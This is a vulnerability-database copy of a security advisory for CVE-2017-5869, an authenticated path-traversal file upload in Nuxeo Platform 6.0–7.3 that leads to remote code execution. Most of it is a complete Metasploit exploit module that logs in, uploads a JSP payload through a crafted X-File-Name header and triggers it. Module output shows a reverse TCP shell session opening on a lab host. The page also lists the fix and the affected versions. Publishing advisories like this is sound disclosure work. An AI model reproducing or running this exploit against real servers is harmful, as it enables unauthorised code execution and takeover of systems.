Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormRonan KervellaPACKETSTORM:141811
HistoryMar 24, 2017 - 12:00 a.m.

Nuxeo Platform 6.x / 7.x Shell Upload

2017-03-2400:00:00
Ronan Kervella
packetstormsecurity.com
65

0.059 Low

EPSS

Percentile

93.5%

JSON
`# Description  
  
Nuxeo Platform is a content management system for enterprises (CMS).  
It embeds an Apache Tomcat server, and can be managed through a web  
interface.  
  
One of its features allows authenticated users to import files to the  
platform.  
By crafting the upload request with a specific ``X-File-Name`` header,  
one can successfuly upload a file at an arbitrary location of the server  
file system.  
  
It is then possible to upload a JSP script to the root directory of the  
web application to execute commands on the remote host operating system.  
Setting the value ``../../nxserver/nuxeo.war/shell.jsp`` to the  
``X-File-Name`` header is a way to do so.  
  
## Details  
  
**CVE ID**: CVE-2017-5869  
  
**Access Vector**: network  
  
**Security Risk**: high  
  
**Vulnerability**: CWE-434  
  
**CVSS Base Score**: 8.8  
  
**CVSS Vector**: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H  
  
# Proof of Concept  
  
Here is a metasploit module to exploit this vulnerability:  
  
```ruby  
##  
# This module requires Metasploit: http://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
require 'msf/core'  
  
class MetasploitModule < Msf::Exploit::Remote  
Rank = ExcellentRanking  
  
include Msf::Exploit::Remote::HttpClient  
  
def initialize(info={})  
super(update_info(info,  
'Name' => "Nuxeo Platform File Upload RCE",  
'Description' => %q{  
The Nuxeo Platform tool is vulnerable to an  
authenticated remote code execution,  
thanks to an upload module.  
},  
'License' => MSF_LICENSE,  
'Author' => ['Ronan Kervella  
<[email protected]>'],  
'References' =>  
[  
['https://nuxeo.com/', '']  
],  
'Platform' => %w{linux},  
'Targets' => [ ['Nuxeo Platform 6.0 to 7.3',  
'Platform' => 'linux'] ],  
'Arch' => ARCH_JAVA,  
'Privileged' => true,  
'Payload' => {},  
'DisclosureDate' => "",  
'DefaultTarget' => 0))  
register_options(  
[  
OptString.new('TARGETURI', [true, 'The path to the nuxeo  
application', '/nuxeo']),  
OptString.new('USERNAME', [true, 'A valid username', '']),  
OptString.new('PASSWORD', [true, 'Password linked to the  
username', ''])  
], self.class)  
end  
  
def jsp_filename  
@jsp_filename ||= Rex::Text::rand_text_alpha(8) + '.jsp'  
end  
  
def jsp_path  
'nxserver/nuxeo.war/' + jsp_filename  
end  
  
def nuxeo_login  
res = send_request_cgi(  
'method' => 'GET',  
'uri' => normalize_uri(target_uri.path, '/login.jsp')  
)  
  
fail_with(Failure::Unreachable, 'No response received from the  
target.') unless res  
session_cookie = res.get_cookies  
  
res = send_request_cgi(  
'method' => 'POST',  
'uri' => normalize_uri(target_uri.path,  
'/nxstartup.faces'),  
'cookie' => session_cookie,  
'vars_post' => {  
'user_name' => datastore['USERNAME'],  
'user_password' => datastore['PASSWORD'],  
'submit' => 'Connexion'  
}  
)  
return session_cookie if res && res.code == 302 &&  
res.redirection.to_s.include?('view_home.faces')  
nil  
end  
  
def trigger_shell  
res = send_request_cgi(  
'method' => 'GET',  
'uri' => normalize_uri(target_uri.path, jsp_filename)  
)  
fail_with(Failure::Unknown, 'Unable to get  
#{full_uri}/#{jsp_filename}') unless res && res.code == 200  
end  
  
def exploit  
print_status("Authenticating using  
#{datastore['USERNAME']}:#{datastore['PASSWORD']}")  
session_cookie = nuxeo_login  
if session_cookie  
payload_url = normalize_uri(target_uri.path, jsp_filename)  
res = send_request_cgi(  
'method' => 'POST',  
'uri' => normalize_uri(target_uri.path,  
'/site/automation/batch/upload'),  
'cookie' => session_cookie,  
'headers' => {  
'X-File-Name' => '../../' + jsp_path,  
'X-Batch-Id' => '00',  
'X-File-Size' => '1024',  
'X-File-Type' => '',  
'X-File-Idx' => '0',  
'X-Requested-With' => 'XMLHttpRequest'  
},  
'ctype' => '',  
'data' => payload.encoded  
)  
fail_with(Failure::Unknown, 'Unable to upload the payload')  
unless res && res.code == 200  
print_status("Executing the payload at  
#{normalize_uri(target_uri.path, payload_url)}.")  
trigger_shell  
else  
fail_with(Failure::Unknown, 'Unable to login')  
end  
end  
  
end  
```  
  
Module output:  
  
```bash  
msf> use exploit/multi/http/nuxeo  
msf exploit(nuxeo) > set USERNAME user1  
USERNAME => user1  
msf exploit(nuxeo) > set PASSWORD password  
PASSWORD => password  
msf exploit(nuxeo) > set rhost 192.168.253.132  
rhost => 192.168.253.132  
msf exploit(nuxeo) > set payload java/jsp_shell_reverse_tcp  
payload => java/jsp_shell_reverse_tcp  
msf exploit(nuxeo) > set lhost 192.168.253.1  
lhost => 192.168.253.1  
msf exploit(nuxeo) > exploit  
  
[-] Handler failed to bind to 192.168.253.1:4444:- -  
[*] Started reverse TCP handler on 0.0.0.0:4444  
[*] Authenticating using user1:password  
[*] Executing the payload at /nuxeo/nuxeo/QBCefwxQ.jsp.  
[*] Command shell session 1 opened (172.17.0.2:4444 ->  
192.168.253.132:43279) at 2017-01-13 14:47:25 +0000  
  
id  
uid=1000(nuxeo) gid=1000(nuxeo)  
groups=1000(nuxeo),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),109(lpadmin),110(sambashare)  
pwd  
/var/lib/nuxeo/server  
```  
  
# Vulnerable code  
  
The vulnerable code is located in the  
`org.nuxeo.ecm.restapi.server.jaxrs.BatchUploadObject` class ([github  
link](https://github.com/nuxeo/nuxeo/blob/b05dde789a6c0c7b5f361608eb6d6bd0fda31f36/nuxeo-features/rest-api/nuxeo-rest-api-server/src/main/java/org/nuxeo/ecm/restapi/server/jaxrs/BatchUploadObject.java#L150)),  
where the header ``X-File-Name`` is not checked.  
  
# Fix  
  
Nuxeo provided a  
[patch](https://github.com/nuxeo/nuxeo/commit/6b3113977ef6c2307f940849a2c196621ebf1892)  
for this issue.  
A hotfix release is also available for Nuxeo 6.0 (Nuxeo 6.0 HF35).  
  
Please note that vulnerability does not affect Nuxeo versions above 7.3.  
  
# Affected versions  
  
* Nuxeo 6.0 (LTS 2014), released 2014-11-06  
* Nuxeo 7.1 (Fast Track, obsoleted by Nuxeo 7.10), released 2015-01-15  
* Nuxeo 7.2 (Fast Track, obsoleted by Nuxeo 7.10), released 2015-03-24  
* Nuxeo 7.3 (Fast Track, obsoleted by Nuxeo 7.10), released 2015-06-24  
  
# Unaffected versions  
  
* Nuxeo 6.0 HF35, released 2017-01-12  
* Nuxeo 7.4 (Fast Track, obsoleted by Nuxeo 7.10), released 2015-10-02  
* Nuxeo 7.10 (LTS 2015), released 2015-11-09  
* Nuxeo 8.10 (LTS 2016), released 2016-12-06  
  
# Credits  
  
Ronan Kervella <[email protected]>  
  
--   
SYSDREAM Labs <[email protected]>  
  
GPG :  
47D1 E124 C43E F992 2A2E  
1551 8EB4 8CD9 D5B2 59A1  
  
* Website: https://sysdream.com/  
* Twitter: @sysdream  
  
`

Related

zdt 2
nvd 1
cvelist 1
osv 1
openvas 1
cve 1
exploitpack 1
prion 1
exploitdb 1
zdt
zdt
Nuxeo 6.0 / 7.1 / 7.2 / 7.3 - Remote Code Execution Exploit
2017-03-28 00:00:00
Nuxeo Platform 6.x / 7.x Shell Upload Exploit
2017-03-25 00:00:00
nvd
nvd
CVE-2017-5869
2017-03-24 14:59:00
cvelist
cvelist
CVE-2017-5869
2017-03-24 14:00:00
osv
osv
CVE-2017-5869
2017-03-24 14:59:00
openvas
openvas
Nuxeo Platform Directory Traversal Vulnerability
2017-03-27 00:00:00
cve
cve
CVE-2017-5869
2017-03-24 14:59:00
exploitpack
exploitpack
Nuxeo 6.07.17.27.3 - Remote Code Execution (Metasploit)
2017-03-27 00:00:00
prion
prion
Directory traversal
2017-03-24 14:59:00
exploitdb
exploitdb
Nuxeo 6.0/7.1/7.2/7.3 - Remote Code Execution (Metasploit)
2017-03-27 00:00:00

0.059 Low

EPSS

Percentile

93.5%

JSON
Related for PACKETSTORM:141811
zdt2nvd1cvelist1osv1openvas1cve1exploitpack1prion1exploitdb1